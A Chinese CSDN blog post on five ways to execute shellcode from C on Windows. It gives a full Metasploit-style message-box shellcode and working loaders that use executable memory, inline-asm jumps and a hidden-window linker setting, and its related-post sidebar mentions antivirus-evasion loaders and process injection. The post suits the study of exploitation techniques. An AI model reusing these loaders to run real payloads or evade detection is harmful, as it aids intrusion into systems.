C调用shellcode方法总结

已于 2024-01-16 09:05:02 修改
阅读量3.2k 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: c语言 单片机 stm32
于 2019-09-02 08:58:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunjikui1255326447/article/details/100191203
版权

1、shellcode 定义:

shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。

 2、可以将dll转成shellcode的c源码(windows下shellcode编写入门_如何编写windows shellcode(x86 - 32位)-CSDN博客这个博客写的挺好)

3、五种调用方法:

// shellcode.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//

#include "pch.h"
#include <iostream>
#include <windows.h>  
#include <stdio.h>  

//data段可读写  
#pragma comment(linker, "/section:.data,RWE")   
//不显示窗口  
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")  
#pragma comment(linker, "/INCREMENTAL:NO") 

unsigned char shellcode[] =
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56"
"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24\x52"
"\xe8\x61\xff\xff\xff\x68\x6f\x78\x58\x20\x68\x61\x67\x65\x42"
"\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24\x0a\x89\xe3\x68\x58"
"\x20\x20\x20\x68\x4d\x53\x46\x21\x68\x72\x6f\x6d\x20\x68\x6f"
"\x2c\x20\x66\x68\x48\x65\x6c\x6c\x31\xc9\x88\x4c\x24\x10\x89"
"\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08";

typedef void(__stdcall *CODE) ();


//http://rshell.blog.163.com/blog/static/41619170201110302937361/  

//第一种方法     
void RunShellCode_1()
{

	PVOID p = NULL;
	if ((p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
		MessageBoxA(NULL, "申请内存失败", "提醒", MB_OK);
	if (!(memcpy(p, shellcode, sizeof(shellcode))))
		MessageBoxA(NULL, "写内存失败", "提醒", MB_OK);

	CODE code = (CODE)p;

	code();

}

//第二种方法     
void RunShellCode_2()
{
	((void(*)(void))&shellcode)();
}

//第三种方法  
void RunShellCode_3()
{
	__asm
	{
		lea eax, shellcode;
		jmp eax;
	}
}

//第四种方法     
void RunShellCode_4()
{
	__asm
	{
		mov eax, offset shellcode;
		jmp eax;
	}
}

//第五种方法     
void RunShellCode_5()
{
	__asm
	{
		mov eax, offset shellcode;
		_emit 0xFF;
		_emit 0xE0;
	}
}


void main()
{
	RunShellCode_1();  
	//RunShellCode_2();  
	//RunShellCode_3();  
	//RunShellCode_4();  
	//RunShellCode_5();
}

司徒荆
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
演示几种用C语言执行shellcode(其实也就是机器码)的方式
冷却
09-21 3737
/* * 作者: 冷却 * 时间: 2009年2月21日 * E-mail: leng_que@yahoo.com.cn * 描述: 演示几种用C语言执行shellcode(其实也就是机器码)的方式 * 备注:在WindowsXP SP3下测试成功 *///一段打开Windows计算器(calc.exe)的shellcodeunsig
shellCode
04-06
通过上述指令的解析可以推断出,这段Shellcode的主要目的是为了寻找并调用Kernel内部的一个或多个函数。具体而言,它首先通过一系列条件判断来确定是否找到了所需的函数地址,并且在找到之后执行该函数。此外,...
基于C++ shellcode及植入目标程序【100011896】
04-12
整体流程主要分为两部分,一是shellcode的生成;二是向目标程序植入shellcode。植入过程主要分为两步:检验当前文件是否为PE文件,是否已被感染 (参照judgePE函数);将shellcode植入目标节,并依据PE文件格式,进行相关参数的修改(参照infect函数)。
【免杀工具】Windows通用免杀shellcode加载器
最新发布
Fly_鹏程万里
06-11 539
本工具由ShellQMaker.exe和加载模板文件(loading.exe)组成。ShellQMaker.exe将不同的shellcode写入加载的模板文件(loading.exe)中,生成不同的可执行文件。运行环境:加载器模板通过QT实现使用C++开发,并由VS2022静态编译,目前只有一种加载模式,其他加载模式正在开发中。使用方法:使用vs2022打开项目解决方案(.sln),然后进行编译即可,当然你也可以从。ShellQMaker (你的shellcode) (生成的可执行文件)
C# 实现shellcode 进程启动注入eip注入
记事本
01-07 2291
首先说下代码原理   1.使用CreateProcess 创建一个带 CREATE_SUSPENDED标记的进程 自然进程创建加载完DLL后会被挂起。 CREATE_SUSPENDED 标记本是为调试器准备的。 2.然后用GetThreadContext获取该进程的线程上下文,保存下来(重要)。。。。 3.用VirtualAllocEx 在进程空间申请一段 dll路径长度 + 32字节的内
回调函数(__stdcall)
把握自己。
02-09 3768
2 过程语言中的回调(C) 2.1 函数指针 回调在C语言中是通过函数指针来实现的,通过将回调函数的地址传给被调函数从而实现回调。因此,要实现回调,必须首先定义函数指针,请看下面的例子: void Func(char *s);// 函数原型 void (*pFunc) (char *);//函数指针 可以看出,函数的定义和函数指针的定义非常类似。 一般的化,为了简化函数指针类型的
使用C编译器编写shellcode
Tody Guo的专栏
12-08 1489
原文出处: Nick Harbour   译文出处: IDF徐文博 背景 有时候程序员们需要写一段独立于位置操作的代码,可当作一段数据写到其他进程或者网络中去。该类型代码在它诞生之初就被称为shellcode,在软件利用中黑客们以此获取到shell权限。方法就是通过这样或那样的恶意手法使得这段代码得以执行,完成它的使命。当然了,该代码仅能靠它自己,作者无法使用现代软件开发的实践来推
C/C++ 到 shellcode 过程
qing666888的专栏
01-16 1740
最简单的弹出cmd代码 1 #include2 #include 3 void main()4 {5 system("start cmd");6 } 为了确保system函数存在,加入LoadLibrary("msvcrt.dll"); 1 #include2 #include 3 4 void main()5 {6 LoadLibrary("msvcrt
【网络杂烩 ---> 网络安全】DLL 注入 --- c/c++ 代码实现(超 · 详细)
扑腾的江鱼复习仓库
12-02 4169
DLL 注入(英语:DLL injection)是一种涉及计算机信息安全的特殊编程技术。它可以强行使一个 进程加载某个 动态链接库以在其私有地址空间内运行指定 代码(往往是恶意代码)。DLL 注入的常见手段是用外部 DLL 库覆盖一个程序原先的 DLL 库,目的是实现该程序的作者未预期的结果。比如,注入的代码可以 挂钩(Hook)系统消息或系统调用,以达到读取密码框的内容等危险目的,而一般编程手段无法达成这些目的。
cpp-在恶意软件分析过程中快速调试shellcode
08-15
在恶意软件分析中,快速调试...总结来说,调试shellcode涉及对二进制代码的理解、动态和静态分析的结合,以及使用专门的调试工具。熟练掌握这些技能对于C++开发者,尤其是进行恶意软件分析的人来说,是必不可少的。
DumpSC:DumpSC是一个简单的bash脚本,可使用objdump从二进制文件中提取Shellcode以便将来注入
04-12
本文将详细讲解 DumpSC 脚本的工作原理、使用方法以及与之相关的技术知识点,包括 Shellcode、objdump 和 xclip。 首先,让我们深入了解 ShellcodeShellcode 是一段能够执行特定操作的机器码,比如打开一个命令行...
shellcode 代码VC程序编写
05-28
在 `__check.c__` 文件中,`shellcode` 数组包含了已编译的机器码,`s()` 函数通过类型转换将 `shellcode` 当作函数指针调用,从而执行 Shellcode,最终弹出消息框。 另外,为了在没有正常执行流程的情况下运行 ...
基于C语言和C++实现网络信息对抗源码+论文.zip
05-31
4.1.2 获取 C 库的 system() 函数入口地址并完成调用 4.1.3 shellcode 的调整 4.1.4 最终的 shellcode 4.2 突破数据执行保护 (DEP) 4.2.1 ROP 链的构造 4.2.2 ROP 链的分析 第五章 测试及分析 5.1 栈内存布局 5.2 ...
1.4 编写简易ShellCode弹窗
热门推荐
CSDN
07-02 1万+
在前面的章节中相信读者已经学会了使用Metasploit工具生成自己的ShellCode代码片段了,本章将继续深入探索关于ShellCode的相关知识体系,ShellCode 通常是指一个原始的可执行代码的有效载荷,攻击者通常会使用这段代码来获得被攻陷系统上的交互Shell的访问权限,而现在用于描述一段自包含的独立的可执行代码片段。ShellCode代码的编写有多种方式,通常会优先使用汇编语言实现,这得益于汇编语言的可控性。
C# Intel x86 汇编类实现(用于编写动态汇编机器码#shellcode
liulilittle的博客
11-04 674
知道易语言写动态汇编shellcode的模块把,类似那种。
滴水三期逆向基础系列(二)-加壳初识-文件开头弹出对话框
henuyl的博客
04-23 643
VOID AddCodeToCodeSec( VOID ){ LPVOID pFileBuffer = NULL; LPVOID pImageBuffer = NULL; LPVOID pNewFileBuffer = NULL; PIMAGE_DOS_HEADER pDosHeader = NULL; PIMAGE_NT_HEADERS pNTHeader = NULL; PIM...
免杀-Shellcode分离隐藏&C++
qq_45087791的博客
02-27 1448
Shellcode分离隐藏-让杀毒找不到。离免杀包含对特征和行为的分离两个维度,把shellcode从放在程序转移到加载进内存,把整块的ShellCode通过分块传输的方法上传然后再拼接,这些体现了基本的"分离"思想。
C++回调C#
jacberg的专栏
08-06 2014
C++回调C# 现在比较流行C#与C++融合:C#做GUI,开发效率高,C++做运算,运行效率高,二者兼得。但是C++与C#必然存在数据交互,C#与C++dll的数据交互从来都是一个让人头疼的问题。 从调用方式看也有两种情况: 1、C#调用C++函数 这种情况用的比较多,数据流向可以是C#流向C++,通过参数将数据传递给C++(如:SetData(double[] data));也可以是C++流向C#(如:GetData(double[] data))。 2、C++ Callback ..
C/C++ 动态解密释放ShellCode
CSDN
09-11 1万+
今天在复习《加密与解密》时,在软件保护这一章中有一个代码与数据结合的案例,其原理是将代码段中的代码进行xor异或加密处理以后回写到原始位置,当程序运行后将此处的内容动态的进行解密,解密后回写替换回原始内存位置,这样就能实现内存加载。 由此案例我想到一个关于免杀的利用思路,首先杀软的运作方式多数为特征码查杀,当我们程序中使用了敏感的函数时,就会存在被杀的风险,而如果将代码段中的代码进行加密,需要时...
在64位系统下用nop雪橇的方式执行shellcode,请用c语言实现
05-30
C语言中,我们可以使用函数指针来实现跳转到shellcode的起始地址。以下是一个使用C语言实现的例子: ```c #include <stdio.h> #include <string.h> // shellcode unsigned char shellcode[] = "\x48\x31\xc0\x48\x89\xc2\x48\x89\xc6\x48\x8d\x54\x24\xf0\x0f\x05"; // 函数指针类型 typedef void (*shellcode_func_t)(void); int main() { // nop sled char nops[1024]; memset(nops, 0x90, sizeof(nops)); // 跳转到shellcode的函数指针 shellcode_func_t shellcode_func = (shellcode_func_t)(nops + sizeof(nops) - sizeof(shellcode)); memcpy((void*)shellcode_func, shellcode, sizeof(shellcode)); // 执行nop sled ((void(*)(void))nops)(); return 0; } ``` 在上面的例子中,我们首先定义了一个64位的shellcode,然后定义了一个函数指针`shellcode_func_t`,用来存储跳转到shellcode的起始地址。接着我们创建了一个长度为1024字节的nop sled,并使用`memset`函数将它填充满nop指令。然后我们通过指针运算来计算出函数指针的地址,将shellcode复制到该地址处。最后,我们通过将nop sled强制转换为函数指针类型,来执行nop sled并跳转到shellcode的起始地址。 需要注意的是,在实际使用中,我们往往需要将这段代码编译成可执行文件,并且需要将shellcode插入到程序的缓冲区中,并且将函数指针中的地址修改为shellcode在缓冲区中的起始地址。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值